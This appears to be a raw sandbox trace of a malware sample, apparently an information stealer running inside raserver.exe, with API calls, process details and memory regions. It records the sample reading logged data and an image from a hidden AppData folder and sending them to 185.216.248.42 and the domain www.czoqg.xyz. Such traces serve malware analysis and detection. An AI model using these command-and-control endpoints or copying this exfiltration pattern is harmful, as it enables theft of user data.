[0288.971] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0288.971] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0288.971] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892ada0) returned 1 [0288.972] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0288.972] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0288.972] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0288.972] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892b3d0) returned 1 [0288.972] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0288.972] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0x1b78, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0288.972] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0288.972] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892b610) returned 1 [0288.972] NtQueryInformationFile (in: FileHandle=0x1b78, IoStatusBlock=0x10b3fa90, FileInformation=0x10b3faa0, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x10b3fa90, FileInformation=0x10b3faa0) returned 0x0 [0288.972] NtReadFile (in: FileHandle=0x1b78, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x10b3fa90, Buffer=0xa0f488a, BufferLength=0x6fe, ByteOffset=0x10b3fa88*=0, Key=0x0 | out: IoStatusBlock=0x10b3fa90, Buffer=0xa0f488a*) returned 0x0 [0288.972] NtClose (Handle=0x1b78) returned 0x0 [0288.972] socket (af=2, type=1, protocol=6) returned 0x1b78 [0288.973] connect (s=0x1b78, name=0x88843a0*(sa_family=2, sin_port=0x50, sin_addr="185.216.248.42"), namelen=16) returned 0 [0289.229] RtlIntegerToChar (in: Value=0xc9d, Base=0x0, Length=0x8, String=0x10b3fae8 | out: String="3229") returned 0x0 [0289.230] send (s=0x1b78, buf=0xa0f8c8a*, len=3623, flags=0) returned 3623 [0289.230] closesocket (s=0x1b78) returned 0 [0289.231] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0289.231] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0289.231] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0289.231] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892aad0) returned 1 [0289.231] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0289.231] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0x1b78, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0289.232] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0289.232] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892bbb0) returned 1 [0289.232] NtQueryInformationFile (in: FileHandle=0x1b78, IoStatusBlock=0x10b3fa90, FileInformation=0x10b3faa0, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x10b3fa90, FileInformation=0x10b3faa0) returned 0x0 [0289.232] NtReadFile (in: FileHandle=0x1b78, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x10b3fa90, Buffer=0xa0f488a, BufferLength=0x28, ByteOffset=0x10b3fa88*=0, Key=0x0 | out: IoStatusBlock=0x10b3fa90, Buffer=0xa0f488a*) returned 0x0 [0289.232] NtClose (Handle=0x1b78) returned 0x0 [0289.232] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0289.232] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0289.232] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0289.232] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892aad0) returned 1 [0289.232] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0289.232] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0289.232] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0289.232] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892aad0) returned 1 [0289.233] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtPathName=0x10b3fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0289.233] NtCreateFile (in: FileHandle=0x10b3fa50, DesiredAccess=0x120089, ObjectAttributes=0x10b3fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa50*=0x1b78, IoStatusBlock=0x10b3fa60*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0289.233] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3f9d0 | out: HeapArray=0x10b3f9d0*=0x4b0000) returned 0x6 [0289.233] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892b970) returned 1 [0289.233] NtQueryInformationFile (in: FileHandle=0x1b78, IoStatusBlock=0x10b3fa60, FileInformation=0x10b3fa70, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x10b3fa60, FileInformation=0x10b3fa70) returned 0x0 [0289.233] NtReadFile (in: FileHandle=0x1b78, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x10b3fa60, Buffer=0x103e984d, BufferLength=0x16987, ByteOffset=0x10b3fa58*=0, Key=0x0 | out: IoStatusBlock=0x10b3fa60, Buffer=0x103e984d*) returned 0x0 [0289.233] NtClose (Handle=0x1b78) returned 0x0 [0289.233] socket (af=2, type=1, protocol=6) returned 0x1b78 [0289.234] connect (s=0x1b78, name=0x88843a0*(sa_family=2, sin_port=0x50, sin_addr="185.216.248.42"), namelen=16) returned 0 [0289.496] RtlIntegerToChar (in: Value=0x282fd, Base=0x0, Length=0x8, String=0x10b3fab8 | out: String="164605") returned 0x0 [0289.498] send (s=0x1b78, buf=0x10469840*, len=165001, flags=0) returned 165001 [0289.501] closesocket (s=0x1b78) returned 0 [0289.501] socket (af=2, type=1, protocol=6) returned 0x1b78 [0289.501] getaddrinfo (in: pNodeName="www.czoqg.xyz", pServiceName="80", pHints=0x8791b98*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x8791bc8 | out: ppResult=0x8791bc8*=0x862bb80*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x88843e0*(sa_family=2, sin_port=0x50, sin_addr="156.251.18.25"), ai_next=0x0)) returned 0 [0289.503] connect (s=0x1b78, name=0x88843e0*(sa_family=2, sin_port=0x50, sin_addr="156.251.18.25"), namelen=16) Thread: id = 167 os_tid = 0x1078 Thread: id = 168 os_tid = 0x107c Thread: id = 169 os_tid = 0x1090 Thread: id = 170 os_tid = 0x1094 Thread: id = 171 os_tid = 0x10a8 Thread: id = 172 os_tid = 0x10c4 Process: id = "5" image_name = "raserver.exe" filename = "c:\\windows\\syswow64\\raserver.exe" page_root = "0x72a6e000" os_pid = "0x700" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x748" cmd_line = "\"C:\\Windows\\SysWOW64\\raserver.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f600" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 955 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 956 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 957 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 958 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 959 start_va = 0xa0000 end_va = 0xdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 960 start_va = 0xe0000 end_va = 0xe3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 961 start_va = 0xf0000 end_va = 0xf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 962 start_va = 0x100000 end_va = 0x101fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 963 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 964 start_va = 0x12b0000 end_va = 0x12cdfff monitored = 0 entry_point = 0x12c1200 region_type = mapped_file name = "raserver.exe" filename = "\\Windows\\SysWOW64\\raserver.exe" (normalized: "c:\\windows\\syswow64\\raserver.exe") Region: id = 965 start_va = 0x12d0000 end_va = 0x52cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012d0000" filename = "" Region: id = 966 start_va = 0x77460000 end_va = 0x775dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 967 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 968 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 969 start_va = 0x7fff0000 end_va = 0x7df884cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 970 start_va = 0x7df884cc0000 end_va = 0x7ff884cbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df884cc0000" filename = "" Region: id = 971 start_va = 0x7ff884cc0000 end_va = 0x7ff884e80fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 972 start_va = 0x7ff884e81000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff884e81000" filename = "" Region: id = 977 start_va = 0x110000 end_va = 0x13efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 979 start_va = 0x12b0000 end_va = 0x12cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012b0000" filename = "" Region: id = 980 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 981 start_va = 0x5f960000 end_va = 0x5f9affff monitored = 0 entry_point = 0x5f978180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 982 start_va = 0x5f9b0000 end_va = 0x5fa29fff monitored = 0 entry_point = 0x5f9c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 983 start_va = 0x76410000 end_va = 0x764effff monitored = 0 entry_point = 0x76423980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 984 start_va = 0x5fa30000 end_va = 0x5fa37fff monitored = 0 entry_point = 0x5fa317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 985 start_va = 0x400000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 986 start_va = 0x76410000 end_va = 0x764effff monitored = 0 entry_point = 0x76423980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 987 start_va = 0x77270000 end_va = 0x773edfff monitored = 0 entry_point = 0x77321b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 988 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 989 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 990 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 991 start_va = 0x570000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 992 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 993 start_va = 0x76b70000 end_va = 0x76beafff monitored = 0 entry_point = 0x76b8e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 994 start_va = 0x76570000 end_va = 0x7662dfff monitored = 0 entry_point = 0x765a5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 995 start_va = 0x160000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 996 start_va = 0x1a0000 end_va = 0x1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 997 start_va = 0x758e0000 end_va = 0x75923fff monitored = 0 entry_point = 0x758f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 998 start_va = 0x76630000 end_va = 0x766dcfff monitored = 0 entry_point = 0x76644f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 999 start_va = 0x74190000 end_va = 0x741adfff monitored = 0 entry_point = 0x7419b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1000 start_va = 0x74180000 end_va = 0x74189fff monitored = 0 entry_point = 0x74182a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1001 start_va = 0x75880000 end_va = 0x758d7fff monitored = 0 entry_point = 0x758c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1002 start_va = 0x755e0000 end_va = 0x75726fff monitored = 0 entry_point = 0x755f1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1003 start_va = 0x76d80000 end_va = 0x76ecefff monitored = 0 entry_point = 0x76e36820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1004 start_va = 0x76ed0000 end_va = 0x76f14fff monitored = 0 entry_point = 0x76eede90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1005 start_va = 0x769b0000 end_va = 0x76b6cfff monitored = 0 entry_point = 0x76a92a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1006 start_va = 0x76bf0000 end_va = 0x76c81fff monitored = 0 entry_point = 0x76c28cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1007 start_va = 0x741b0000 end_va = 0x755aefff monitored = 0 entry_point = 0x7436b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1008 start_va = 0x6ea20000 end_va = 0x6ea2efff monitored = 0 entry_point = 0x6ea22a50 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\SysWOW64\\wtsapi32.dll" (normalized: "c:\\windows\\syswow64\\wtsapi32.dll") Region: id = 1009 start_va = 0x75940000 end_va = 0x75976fff monitored = 0 entry_point = 0x75943b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 1010 start_va = 0x75f10000 end_va = 0x76408fff monitored = 0 entry_point = 0x76117610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 1011 start_va = 0x755d0000 end_va = 0x755dbfff monitored = 0 entry_point = 0x755d3930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 1012 start_va = 0x76cf0000 end_va = 0x76d7cfff monitored = 0 entry_point = 0x76d39b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 1013 start_va = 0x766e0000 end_va = 0x76723fff monitored = 0 entry_point = 0x766e7410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 1014 start_va = 0x77450000 end_va = 0x7745efff monitored = 0 entry_point = 0x77452e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1015 start_va = 0x75d90000 end_va = 0x75f07fff monitored = 0 entry_point = 0x75de8a90 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 1016 start_va = 0x755c0000 end_va = 0x755cdfff monitored = 0 entry_point = 0x755c5410 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 1017 start_va = 0x4c0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 1018 start_va = 0x500000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 1019 start_va = 0x6e9f0000 end_va = 0x6e9f9fff monitored = 0 entry_point = 0x6e9f28d0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 1020 start_va = 0x6ea00000 end_va = 0x6ea14fff monitored = 0 entry_point = 0x6ea05210 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll") Region: id = 1021 start_va = 0x670000 end_va = 0x82ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 1022 start_va = 0x540000 end_va = 0x569fff monitored = 0 entry_point = 0x545680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" 